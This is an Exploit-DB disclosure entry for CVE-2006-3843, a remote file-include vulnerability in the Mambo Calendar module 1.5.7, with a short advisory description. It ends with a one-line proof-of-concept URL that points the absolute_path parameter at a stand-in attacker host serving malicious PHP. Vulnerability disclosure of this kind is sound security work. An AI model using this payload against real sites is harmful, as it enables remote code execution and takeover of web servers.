Calendar Module 1.5.7 For Mambo Com_Calendar.PHP Remote File Include Vulnerability

2006-07-17T00:00:00
ID EDB-ID:28233
Type exploitdb
Reporter Matdhule
Modified 2006-07-17T00:00:00

Description

Calendar Module 1.5.7 For Mambo Com_Calendar.PHP Remote File Include Vulnerability. CVE-2006-3843. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/19027/info

The Calendar module for Mambo is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects version 1.5.7; other versions may also be vulnerable.

http://www.example.com/[target]/[path]/components/com_articles.php?absolute_path=http://attacker.com/evil.txt?